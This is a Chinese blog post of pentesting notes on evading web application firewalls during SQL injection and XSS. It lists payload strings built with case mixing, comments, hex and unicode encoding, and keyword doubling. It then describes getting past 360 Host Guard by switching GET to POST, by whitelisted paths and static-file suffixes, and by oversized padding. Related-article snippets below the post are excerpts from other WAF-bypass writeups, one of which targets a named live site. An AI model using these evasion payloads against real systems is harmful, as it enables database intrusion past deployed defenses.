waf绕过—过360主机卫士sql注入

最新推荐文章于 2023-08-08 00:02:36 发布
最新推荐文章于 2023-08-08 00:02:36 发布
阅读量2.7k 收藏 4
点赞数
分类专栏: SQL注入 渗透测试 网络安全 文章标签: web安全 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/123318527
版权
渗透测试 同时被 3 个专栏收录
55 篇文章 11 订阅
订阅专栏
网络安全
46 篇文章 24 订阅
订阅专栏
SQL注入
22 篇文章 1 订阅
订阅专栏

文章目录


大部分waf是基于正则表达式

waf规则大多都有黑白名单,尤其是早期的waf,规则写的很死

绕waf类型

  • 大小写转换法

    • 在waf里,使用的正则不完善或者是没有用大小写转换函数

      • 示例:

        SQL:sEleCt vERsIoN()

        XSS:<sCrIpt>aleRt(1)</scrIpt>

  • 干扰字符污染

    • 利用网站使用的语言函数特性来绕过waf的规则或者使用会无视的字符

      SQL:select version();`he
SQL2:select/*!*/`version`();
XSS

  • 字符编码法

    • 利用浏览器上的进制转换或者语言编码规则来绕过waf,就是对一些字符进行编码,常见的SQL编码有unicode、HEX、URL、ascll、base64等,XSS编码有:HTML、URL、ASCII、js编码、base64等等

      SQL:load_file(0x633A2F77696E646F77732F6D792E696E69)
XSS:<script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>

  • 拼凑法

    • 利用waf的不完整性,只验证一次字符串或者过滤的字符串并不完整

      SQL:selselectect verversionsion();
XSS:<scr<script>rip>alalertert</scr</script>rip>

数据库特性

注释

#
-- 
-- - 
--+ 
// 
/**/ 
/*letmetest*/ 
;%00

空白字符

SQLite3 0A 0D 0C 09 20  
MySQL5 09 0A 0B 0C 0D A0 20  
PosgresSQL 0A 0D 0C 09 20  
Oracle 11g 00 0A 0D 0C 09 20  
MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

可运用的sql函数&关键字:

MySQL:

字符转换 
Char(49) 
Hex('a') 
Unhex(61) 
过滤了逗号 
(1)limit处的逗号: limit 1 offset 0 
(2)字符串截取处的逗号 mid处的逗号: mid(version() from 1 for 1) union distinct 
union distinctrow 
procedure analyse() 
updatexml() 
extracavalue() 
exp() 
ceil() 
atan() 
sqrt() 
floor() 
ceiling() 
tan() 
rand() 
sign() 
greatest() 

字符串截取函数 
Mid(version(),1,1) 
Substr(version(),1,1) 
Substring(version(),1,1) 
Lpad(version(),1,1) 
Rpad(version(),1,1) 
Left(version(),1) 
reverse(right(reverse(version()),1) 

字符串连接函数 concat(version(),'|',user()); 
concat_ws('|',1,2,3) 

字符转换 
Char(49) 
Hex('a') 
Unhex(61) 
过滤了逗号 
(1)limit处的逗号: limit 1 offset 0 
(2)字符串截取处的逗号 mid处的逗号: mid(version() from 1 for 1)

MSSQL:

IS_SRVROLEMEMBER() 
IS_MEMBER() 
HAS_DBACCESS() 
convert() 
col_name() 
object_id() 
is_srvrolemember() 
is_member() 
字符串截取函数 Substring(@@version,1,1) 
Left(@@version,1) 
Right(@@version,1) 

字符串转换函数 Ascii('a') 这里的函数可以在括号之间添加空格的,一些waf过滤不严会导致bypass Char('97') 
exec

容器特性:

%

asp+iis的环境中,当我们请求的url中存在单一的百分号%时,iis+asp会将其忽略掉

%u

iis支持unicode的解析,当我们请求的url存在unicode字符串的话iis会自动将其转换

案例:

s%u0065lect->select
s%u00f0lect->select

字母a:
%u0000
%u0041
%u0061
%u00aa
%u00e2
单引号:
%u0027
%u02b9
%u02bc
%u02c8
%u2032
%uff07
%c0%27
%c0%a7
%e0%80%a7
空白:
%u0020
%uff00
%c0%20
%c0%a0
%e0%80%a0
左括号(:
%u0028
%uff08
%c0%28
%c0%a8
%e0%80%a8
右括号):
%u0029
%uff09
%c0%29
%c0%a9
%e0%80%a9

过360主机卫士SQL注入

image-20220306220340327

可以发现and被过滤了

但是当语句不完整时不会过滤and,只有拼接成完整的语句时一定会拦

测试waf拦截的过程叫做模糊测试(fuzz)

?id=1 and 1=

image-20220307130402446

可采用post注入的方式,即可绕过360的waf拦截

image-20220307130807655

有些waf只拦get请求,在post里随便写东西就过了

image-20220307131131226

黑白名单

例如利用网站后台白名单,在参数里加上白名单所允许的字符即可绕过

/index.php/system?id=1 union select 1,2,3,4,5

image-20220307131454647

静态文件

js,jpg,txt,png等文件后缀,也是类似于白名单的一个机制

waf遇到这种后缀,会自动跳过检测

image-20220307132146935

垃圾字符

不同的waf开发时都有设定的最大字符长度,例如曾经的阿里云长度29mb

超过字符限制,后面的就不再检测

另类协议

Shadow丶S
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【经验总结】SQL注入Bypass安全360主机卫士
TeamsSix 的 CSDN 空间
01-05 833
0x00 前言 这类的文章已经是比较多了,本文也主要是作为学习笔记来记录,主要是记录一下我在学习 SQL 注入 Bypass 的过程,同时前人的不少绕过方法已经失效了,所以这里也是记录一下最新规则的一些绕过方法。 0x01 环境搭建 测试环境:Win7 + Apache + MySQL 5.7.26 + PHP 5.5.45 测试代码: <?php if ($_GET['id']==null...
SQL注入——waf绕过
cldimd的博客
03-19 2470
什么是waf Web应用防护系统 (也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 防火墙 包过滤防火墙  隔绝网络 状态检测防火墙 应用层防火...
编码绕过WAF
OneMoreThink
08-08 92
测试的环境 后端环境WAF环境阿里云WAF[1]360磐云WAF[2]安恒明御WAF[3]测试的思路 先在后端环境(DVWA)验证payload能否成功执行,不能为了绕过绕过,选出25个真实有效的payload;再用payload测试WAF,得出WAF对payload的拦截率。1、制作并验证payload 本次用于编码绕过WAF的payload是 1' and 1=1#。制作步骤一:将 and ...
Bypass 360主机卫士SQL注入防御(多姿势).pdf
12-21
Bypass 360主机卫士SQL注入防御(多姿势).pdf
Bypass 360主机卫士SQL注入防御(多姿势)
weixin_33675507的博客
06-04 205
0x00 前言 在服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影。从半年前的测试虚拟机里面,翻出了360主机卫士Apache版的安装包,就当做是一个纪念版吧。这边主要分享一下几种思路,Bypass 360主机卫士SQL注入防御。 0x01 环境搭建 360主机卫士官网:http...
360 php waf,cmseasy 最新版补丁绕过sql注入绕过360waf
weixin_35648005的博客
03-12 479
首先还是老地方:archive_act.php(611行)function respond_action() {include_once ROOT . '/lib/plugins/pay/' . front::$get['code'] . '.php';$payclassname = front::$get['code'];$payobj = new $payclassname();$uri = ...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAFWeb Application Firewall)的常见特征是指其具有审计...
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
2019最新过狗过,云锁,360WAF的PHP免杀大马
02-02
2019最新过狗过,云锁,360WAF的PHP免杀大马等主流防护软件
360网神WEB应用安全云防护系统产品白皮书
11-13
随着越来越多的行业逐渐向“云”端过渡,适用于不同行业的“私有云”或者“公有云”解决方案层出不穷,随之而来的挑战就是大数据的集中存储和集中分析。特别是随着办公信息化、企业信息化的普及,很多政务系统、OA系统以及其他对外信息发布系统的上线,也产生了日益庞大的数据。这些数据中不仅仅包含了正常业务数据同时也包含大量的网络攻击行为。大数据作为“未来的新石油”,为我们提供了很多信息的金矿。未来的网站安全服务市场,一定是一个基于云服务的安全运维管理平台。在 云计算、IT 服务化日渐普及的今天,企业及成员单位网站迫切需要专业化的队伍供全面的、专业的网站安全保护服务。
360 php waf,关于绕过360WAF的几点思路总结_91Ri.org
weixin_31864641的博客
03-12 990
前一阵看到论坛有个兄弟发发帖问怎么绕过360WAF,而且还给出了上传点路径(由于涉及到具体的上传点url,帖子和作者的名字在这就不提及了)。好奇之下去逛了逛, 试了几个比较常见的注入测试字符,确实有360拦截。试了下作者给的上传点,WAF阻止了后缀名变形,图片内容插马的方法。不过,我在用plus-editor浏览图片内容时,发现图片中有这么一段像脚本一样的内容上网查了下这段内容的含义,大概是说,这...
轻松bypass360网站卫士WAFSQL注入防护
h4ck0ne的博客
01-23 3299
随便网上找了一个网站,只是测试一下,没有干非法的事情! code 区域 http://www.py-guanyun.com/CompHonorBig.asp?id=49  code 区域 http://www.py-guanyun.com/CompHonorBig.asp?id=49 and 1=1 被拦截 换一个姿势看看: code 区域 http://www.py-g
web渗透测试WAF绕过讲解(二)基于HTTP协议绕过
ZDH5362的博客
08-20 557
0x01 前言 在讲本课的内容之前我们先来了解互联网中的HTTP是什么? 超文本传输协议(HTTP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议。所有的WWW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。1960年美国人Ted Nelson构思了一种通过...
360网站卫士SQL注入绕过案例一个
weixin_30911809的博客
01-23 378
不要以为用了360就可以高枕无忧,直接在netcraft的site_report中找到源站服务器IP,直接SQL脱裤,甚至可获取服务器权限。 存在漏洞的网站: 手工测试存在注入点: 但是网站有360保护,没法脱裤,必须想办法绕过360网站卫士都是劫持域名进行流量清洗,但是如果源站服务器防护的不好可能存在绕过。于是在网上搜索,终于在netcraft上找到: 源...
WAF Bypass】文件上传绕过waf姿势总结
m0_46103905的博客
06-01 1656
总结了文件上传绕waf的一些姿势,以及针对网站安全狗进行了实战演练。
如何利用DLL注入绕过火绒和360主动防御写入扇区?
ceeyourbac的博客
12-15 4058
前言 由于我自己是一个系统安全爱好者,之前下载了一个能覆写所有扇区的病毒源码,我以为火绒可以保护我的扇区,我就傻乎乎的调试运行了,然后火绒把mbr写入拦截了,我以为没有任何问题了,已重启,哦,Missing Operating System。 在痛失电脑之后,我一直在想病毒是如何做到火绒报警了但是还是写入了扇区?后来我简单分析了源码之后,我看到了这样的一段代码 int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR l
数据库语法整理及WAF绕过方式
程序员小麦的博客
06-24 1205
关系型数据库:指采用了关系模型来组织数据的数据库。
waf绕过sql注入
最新发布
06-26
Web应用程序防火墙(WAFWeb Application Firewall)是一种网络安全设备或服务,用于检测和阻止针对Web应用的攻击,包括SQL注入等。SQL注入是攻击者通过恶意输入,将SQL代码插入到应用程序的数据库查询中,意图获取敏感信息或篡改数据。 WAF绕过SQL注入通常是攻击者针对WAF安全策略和技术限制来实施的一种技术手段,常见的方法包括: 1. **参数编码和转义**: 攻击者可能会尝试使用特殊字符的转义序列,如\"\'(单引号)或\"\"(双引号),来欺骗WAF,使其误判为合法的输入。 2. **利用WAF规则漏洞**: 一些老旧或配置不当的WAF可能无法识别复杂的注入模式,攻击者会利用这些漏洞进行攻击。 3. **HTTP头部注入**: 攻击者可能会尝试将SQL注入嵌入到HTTP头部请求中,有些WAF可能只关注请求体而忽视头部。 4. **使用存储过程或动态SQL**: 通过调用服务器端已存在的存储过程,或者构造动态SQL,使攻击难以被WAF直接拦截。 5. **利用API或JSON Web Token (JWT)**: 如果攻击发生在API层面,攻击者可能会利用API的认证机制,将SQL注入隐藏在合法的API调用中。 6. **社会工程学攻击**: 通过利用用户信任或权限漏洞,让目标用户执行包含SQL注入的恶意操作。 要防止WAF绕过,应不断更新和强化WAF规则,同时采用多重防御策略,比如使用参数化查询、输入验证、异常处理和对用户输入的深度检查。此外,定期审计和安全测试也是防止此类攻击的重要手段。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值